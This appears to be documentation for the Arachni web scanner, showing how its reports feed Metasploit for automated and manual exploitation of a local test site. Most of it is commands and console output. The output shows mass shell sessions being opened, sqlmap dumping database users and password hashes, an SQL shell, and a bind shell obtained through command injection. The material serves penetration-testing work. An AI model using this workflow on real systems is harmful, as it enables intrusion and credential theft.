# WebApp exploitation with Arachni and Metasploit
Arachni provides advanced exploitation techniques via the:
- ArachniMetareport, an Arachni report specifically designed to provide WebApp context to the [Metasploit](http://www.metasploit.com/) framework.
- Arachni plug-in for the [Metasploit](http://www.metasploit.com/) framework, used to load the ArachniMetareport in order to provide advanced automated and manual exploitation of WebApp vulnerabilities.
- Advanced generic WebApp exploit modules for the [Metasploit](http://www.metasploit.com/) framework, utilized either manually or automatically by the Arachni MSF plug-in.
Please be warned that at the moment Metasploit integration is here as a proof-of-concept
and is not officially supported nor a high priority.
##Installation
To install the necessary files all you need to do is copy the contents of the "external/metasploit" directory to Metasploit's root.
$ cp -R arachni/external/metasploit/* metasploit/
##Usage
###Creating the Metareport
#### New scan
$ ./arachni.rb http://localhost/~zapotek/tests/ --report=metareport:outfile=localhost.afr.msf
Arachni - Web Application Security Scanner Framework v0.2.1 [0.1.9]
Author: Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
(With the support of the community and the Arachni Team.)
Website: http://github.com/Arachni/arachni
Documentation: http://github.com/Arachni/arachni/wiki
[~] No modules were specified.
[~] -> Will run all mods.
[~] No audit options were specified.
[~] -> Will audit links, forms and cookies.
[...snipping a whole lot of scan output...]
[*] Creating file for the Metasploit framework...
[*] Saved in 'localhost.afr.msf'.
[*] Dumping audit results in 'metareport.afr'.
[*] Done!
#### Converting an existing report
To convert a standard Arachni Framework Report (.afr) file to a Metareport (.afr.msf) file:
$ ./arachni.rb --repload=localhost.afr --report=metareport:outfile=localhost.afr.msf
Arachni - Web Application Security Scanner Framework v0.2.1 [0.1.9]
Author: Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
(With the support of the community and the Arachni Team.)
Website: http://github.com/Arachni/arachni
Documentation: http://github.com/Arachni/arachni/wiki
[*] Creating file for the Metasploit framework...
[*] Saved in 'localhost.afr.msf'.
### Using the Arachni plug-in via Metasploit
#### Loading the ArachniMetareport
$ ./msfconsole # Start the MSF
888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 620 exploits - 307 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r10844 updated today (2010.10.29)
msf > load arachni # Load the Arachni plug-in
[*] Successfully loaded plugin: arachni
msf > arachni_load ../arachni/localhost.afr.msf # Load the ArachniMetareport using the Arachni plug-in
[*] Loading report...
[*] Loaded 19 vulnerabilities.
Unique exploits
===============
ID Exploit Description
-- ------- -----------
1 unix/webapp/arachni_php_include
This module allows complex HTTP requests to be crafted in order to
allow exploitation of PHP remote file inclusion vulnerabilities.
Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
i.e. where the payload should go.
Supported vectors: GET, POST, COOKIE, HEADER.
(Mainly for use with the Arachni plug-in.)
2 unix/webapp/arachni_exec
This module allows complex HTTP requests to be crafted in order to
allow exploitation of command injection vulnerabilities in Unix-like platforms.
Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
i.e. where the payload should go.
Supported vectors: GET, POST, COOKIE, HEADER.
(Mainly for use with the Arachni plug-in.)
3 unix/webapp/arachni_php_eval
This module allows complex HTTP requests to be crafted in order to
allow exploitation of PHP eval() vulnerabilities in Unix-like platforms.
Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
i.e. where the payload should go.
Supported vectors: GET, POST, COOKIE, HEADER.
(Mainly for use with the Arachni plug-in.)
4 unix/webapp/arachni_sqlmap
This module is designed to be used with the Arachni plug-in.
From the original:
This module launches an sqlmap session.
sqlmap is an automatic SQL injection tool developed in Python.
Its goal is to detect and take advantage of SQL injection
vulnerabilities on web applications. Once it detects one
or more SQL injections on the target host, the user can
choose among a variety of options to perform an extensive
back-end database management system fingerprint, retrieve
DBMS session user and database, enumerate users, password
hashes, privileges, databases, dump entire or user
specific DBMS tables/columns, run his own SQL SELECT
statement, read specific files on the file system and much
more.
Vulnerabilities
===============
ID Host Path Name Method Params Exploit
-- ---- ---- ---- ------ ------ -------
1 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
2 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
3 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
4 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
5 127.0.0.1 /~zapotek/tests/cookies/rfi.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
6 127.0.0.1 /~zapotek/tests/cookies/rfi.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
7 127.0.0.1 /~zapotek/tests/cookies/eval.php Code injection COOKIE {"eval"=>"%3BXXinjectionXX"} unix/webapp/arachni_php_eval
8 127.0.0.1 /~zapotek/tests/forms/eval.php Code injection POST {"eval"=>";XXinjectionXX"} unix/webapp/arachni_php_eval
9 127.0.0.1 /~zapotek/tests/forms/os_command.php OS command injection POST {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
10 127.0.0.1 /~zapotek/tests/forms/os_command.php OS command injection POST {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
11 127.0.0.1 /~zapotek/tests/forms/rfi.php Remote file inclusion POST {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
12 127.0.0.1 /~zapotek/tests/forms/rfi.php Remote file inclusion POST {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
13 127.0.0.1 /~zapotek/tests/forms/sqli.php SQL Injection POST {"sql_inj"=>"1"} unix/webapp/arachni_sqlmap
14 127.0.0.1 /~zapotek/tests/links/os_command.php OS command injection GET {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
15 127.0.0.1 /~zapotek/tests/links/os_command.php OS command injection GET {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
16 127.0.0.1 /~zapotek/tests/links/rfi.php Remote file inclusion GET {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
17 127.0.0.1 /~zapotek/tests/links/rfi.php Remote file inclusion GET {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
18 127.0.0.1 /~zapotek/tests/links/eval.php Code injection GET {"eval"=>";XXinjectionXX"} unix/webapp/arachni_php_eval
19 127.0.0.1 /~zapotek/tests/links/sqli.php Blind SQL Injection GET {"id"=>"1"} unix/webapp/arachni_sqlmap
[*] Done!
msf >
#### Automated exploitation (arachni_autopwn)
##### Usage
msf > arachni_autopwn
[*] Usage: arachni_autopwn [options]
-h Display this help text
-x [regexp] Only run modules whose name matches the regex
-a Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-m Use a meterpreter shell (if possible)
-q Disable exploit module output
##### Example
msf > arachni_autopwn -a
[*] Running pwn-jobs...
[...snip...]
[*] Command shell session 1 opened (127.0.0.1:54598 -> 127.0.0.1:5019) at 2010-10-28 18:26:00 +0100
[*] Command shell session 2 opened (127.0.0.1:55336 -> 127.0.0.1:8541) at 2010-10-28 18:26:00 +0100
[*] Command shell session 3 opened (127.0.0.1:37880 -> 127.0.0.1:12465) at 2010-10-28 18:26:00 +0100
[*] Command shell session 4 opened (127.0.0.1:49451 -> 127.0.0.1:10866) at 2010-10-28 18:26:00 +0100
[*] Command shell session 5 opened (127.0.0.1:40276 -> 127.0.0.1:11915) at 2010-10-28 18:26:00 +0100
[*] Command shell session 6 opened (127.0.0.1:34400 -> 127.0.0.1:5222) at 2010-10-28 18:26:00 +0100
[*] Command shell session 7 opened (127.0.0.1:58456 -> 127.0.0.1:10955) at 2010-10-28 18:26:00 +0100
[*] Command shell session 9 opened (127.0.0.1:48549 -> 127.0.0.1:5929) at 2010-10-28 18:26:00 +0100
[*] Command shell session 8 opened (127.0.0.1:47028 -> 127.0.0.1:12432) at 2010-10-28 18:26:00 +0100
[*] Command shell session 10 opened (127.0.0.1:38239 -> 127.0.0.1:11919) at 2010-10-28 18:26:00 +0100
[*] Command shell session 11 opened (127.0.0.1:58541 -> 127.0.0.1:14343) at 2010-10-28 18:26:01 +0100
[*] Command shell session 12 opened (127.0.0.1:48655 -> 127.0.0.1:13743) at 2010-10-28 18:26:01 +0100
[*] Command shell session 13 opened (127.0.0.1:59996 -> 127.0.0.1:8895) at 2010-10-28 18:26:01 +0100
[*] Command shell session 14 opened (127.0.0.1:53717 -> 127.0.0.1:10767) at 2010-10-28 18:26:01 +0100
[*] Command shell session 15 opened (127.0.0.1:51623 -> 127.0.0.1:7668) at 2010-10-28 18:26:01 +0100
[*] Command shell session 16 opened (127.0.0.1:47874 -> 127.0.0.1:8965) at 2010-10-28 18:26:02 +0100
[...snip...]
[*] The autopwn command has completed with 16 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================
Active sessions
===============
Id Type Information Connection Via
-- ---- ----------- ---------- ---
1 shell 127.0.0.1:54598 -> 127.0.0.1:5019 exploit/unix/webapp/arachni_php_eval
2 shell 127.0.0.1:55336 -> 127.0.0.1:8541 exploit/unix/webapp/arachni_exec
3 shell 127.0.0.1:37880 -> 127.0.0.1:12465 exploit/unix/webapp/arachni_exec
4 shell 127.0.0.1:49451 -> 127.0.0.1:10866 exploit/unix/webapp/arachni_php_include
5 shell 127.0.0.1:40276 -> 127.0.0.1:11915 exploit/unix/webapp/arachni_php_eval
6 shell 127.0.0.1:34400 -> 127.0.0.1:5222 exploit/unix/webapp/arachni_exec
7 shell 127.0.0.1:58456 -> 127.0.0.1:10955 exploit/unix/webapp/arachni_php_include
8 shell 127.0.0.1:47028 -> 127.0.0.1:12432 exploit/unix/webapp/arachni_exec
9 shell 127.0.0.1:48549 -> 127.0.0.1:5929 exploit/unix/webapp/arachni_exec
10 shell 127.0.0.1:38239 -> 127.0.0.1:11919 exploit/unix/webapp/arachni_exec
11 shell 127.0.0.1:58541 -> 127.0.0.1:14343 exploit/unix/webapp/arachni_php_include
12 shell 127.0.0.1:48655 -> 127.0.0.1:13743 exploit/unix/webapp/arachni_php_include
13 shell 127.0.0.1:59996 -> 127.0.0.1:8895 exploit/unix/webapp/arachni_php_include
14 shell 127.0.0.1:53717 -> 127.0.0.1:10767 exploit/unix/webapp/arachni_php_include
15 shell 127.0.0.1:51623 -> 127.0.0.1:7668 exploit/unix/webapp/arachni_php_eval
16 shell 127.0.0.1:47874 -> 127.0.0.1:8965 exploit/unix/webapp/arachni_php_include
[*] ================================================================================
msf > sessions -i 1
[*] Starting interaction with 1...
ls
eval.php
os_command.php
rfi.php
sqli.php
xss.php
whoami
www-data
^C
Abort session 1? [y/N] y
[*] Command shell session 1 closed. Reason: User exit
msf >
Notice that we ended up with 16 sessions out of the 19 reported vulnerabilities. <br/>
This is due to the fact that the "unix/webapp/arachni_sqlmap" exploit can't be launched automatically and because some of the reported vulnerabilities are basically the same.
Next we'll see how to use the "arachni_manual" command for assisted exploitation and get an SQL shell.
### Assisted exploitation (arachni_manual)
msf > arachni_list_vulns # Let's take a look at the available vulnerabilities once again.
Vulnerabilities
===============
ID Host Path Name Method Params Exploit
-- ---- ---- ---- ------ ------ -------
1 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
2 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
3 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
4 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
5 127.0.0.1 /~zapotek/tests/cookies/rfi.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
6 127.0.0.1 /~zapotek/tests/cookies/rfi.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
7 127.0.0.1 /~zapotek/tests/cookies/eval.php Code injection COOKIE {"eval"=>"%3BXXinjectionXX"} unix/webapp/arachni_php_eval
8 127.0.0.1 /~zapotek/tests/forms/eval.php Code injection POST {"eval"=>";XXinjectionXX"} unix/webapp/arachni_php_eval
9 127.0.0.1 /~zapotek/tests/forms/os_command.php OS command injection POST {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
10 127.0.0.1 /~zapotek/tests/forms/os_command.php OS command injection POST {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
11 127.0.0.1 /~zapotek/tests/forms/rfi.php Remote file inclusion POST {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
12 127.0.0.1 /~zapotek/tests/forms/rfi.php Remote file inclusion POST {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
13 127.0.0.1 /~zapotek/tests/forms/sqli.php SQL Injection POST {"sql_inj"=>"1"} unix/webapp/arachni_sqlmap
14 127.0.0.1 /~zapotek/tests/links/os_command.php OS command injection GET {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
15 127.0.0.1 /~zapotek/tests/links/os_command.php OS command injection GET {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
16 127.0.0.1 /~zapotek/tests/links/rfi.php Remote file inclusion GET {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
17 127.0.0.1 /~zapotek/tests/links/rfi.php Remote file inclusion GET {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
18 127.0.0.1 /~zapotek/tests/links/eval.php Code injection GET {"eval"=>";XXinjectionXX"} unix/webapp/arachni_php_eval
19 127.0.0.1 /~zapotek/tests/links/sqli.php Blind SQL Injection GET {"id"=>"1"} unix/webapp/arachni_sqlmap
msf > arachni_manual 19 # The vulnerability with ID '19' uses the 'unix/webapp/arachni_sqlmap' module
[*] Using unix/webapp/arachni_sqlmap .
[*] Preparing datastore for 'Blind SQL Injection' vulnerability @ 127.0.0.1/~zapotek/tests/links/sqli.php ...
SRVHOST => 127.0.0.1
SRVPORT => 7872
RHOST => 127.0.0.1
RPORT => 80
LHOST => 127.0.0.1
LPORT => 12633
SSL => false
GET => id=1
METHOD => GET
COOKIES =>
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/0.2.1
PATH => /~zapotek/tests/links/sqli.php
[*] Done!
Compatible payloads
===================
Name Description
---- -----------
Use: set PAYLOAD <name>
msf auxiliary(arachni_sqlmap) > show options # Make sure that everything is setup properly
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
COOKIES no
GET id=1 no HTTP GET query
METHOD GET yes HTTP Method
OPTS --users --time-test --passwords --dbs --sql-shell -v 0 no The sqlmap options to use
PATH /~zapotek/tests/links/sqli.php yes The path to test for SQL injection
POST no The data string to be sent through POST
Proxies no Use a proxy chain
RHOST 127.0.0.1 yes The target address
RPORT 80 yes The target port
SQLMAP_PATH sqlmap yes The sqlmap >= 0.8 full path
VHOST no HTTP server virtual host
msf auxiliary(arachni_sqlmap) > set SQLMAP_PATH /home/zapotek/Downloads/sqlmap/sqlmap.py # Tell the module where the sqlmap script is
SQLMAP_PATH => /home/zapotek/Downloads/sqlmap/sqlmap.py
msf auxiliary(arachni_sqlmap) > exploit # rock it!
[*] exec: /home/zapotek/Downloads/sqlmap/sqlmap.py -u 'http://127.0.0.1:80//~zapotek/tests/links/sqli.php?id=1' --method GET --users --time-test --passwords --dbs --sql-shell -v 0 --cookie ''
sqlmap/0.8 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 15:08:25
[15:08:26] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
time based blind sql injection payload: 'id=1%27%20AND%20SLEEP%285%29%20AND%20%27HXME%27=%27HXME'
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'zonster'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *7AD474111CBF8492D9311D6E8493490ED6247D86
[*] phpmyadmin [1]:
password hash: *C3A70F18627A18967A3A70C0F648CDEE0BCE9AB2
[*] root [1]:
password hash: NULL
available databases [5]:
[*] arachni
[*] information_schema
[*] msf
[*] mysql
[*] phpmyadmin
sql-shell> CURRENT_USER() # And we now have an SQL shell to play with!
do you want to retrieve the SQL statement output? [Y/n]
CURRENT_USER(): 'root@localhost'
sql-shell> VERSION()
do you want to retrieve the SQL statement output? [Y/n]
VERSION(): '5.1.49-1ubuntu8'
sql-shell> q
[*] shutting down at: 15:09:07
[*] Auxiliary module execution completed
msf auxiliary(arachni_sqlmap) >
Of course 'arachni_manual' is not limited to any one module.
For example:
msf auxiliary(arachni_sqlmap) > arachni_manual 15 # Prepare the vulnerability with ID '15'
[*] Using unix/webapp/arachni_exec .
[*] Preparing datastore for 'OS command injection' vulnerability @ 127.0.0.1/~zapotek/tests/links/os_command.php ...
SRVHOST => 127.0.0.1
SRVPORT => 9033
RHOST => 127.0.0.1
RPORT => 80
LHOST => 127.0.0.1
LPORT => 11853
SSL => false
GET => os_command=XXinjectionXX
METHOD => GET
COOKIES =>
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/0.2.1
PATH => /~zapotek/tests/links/os_command.php
[*] Done!
PAYLOAD => cmd/unix/bind_perl
msf exploit(arachni_exec) > exploit # rock it!
[*] Sending HTTP request for /~zapotek/tests/links/os_command.php
[*] Started bind handler
[*] Command shell session 17 opened (127.0.0.1:45295 -> 127.0.0.1:11853) at 2010-10-29 15:13:48 +0100 # And we now have a system shell!
ls
eval.php
os_command.php
redirect.php
rfi.php
sqli.php
xss.php
whoami
www-data
^C
Abort session 17? [y/N] y
[*] Command shell session 17 closed. Reason: User exit
msf exploit(arachni_exec) >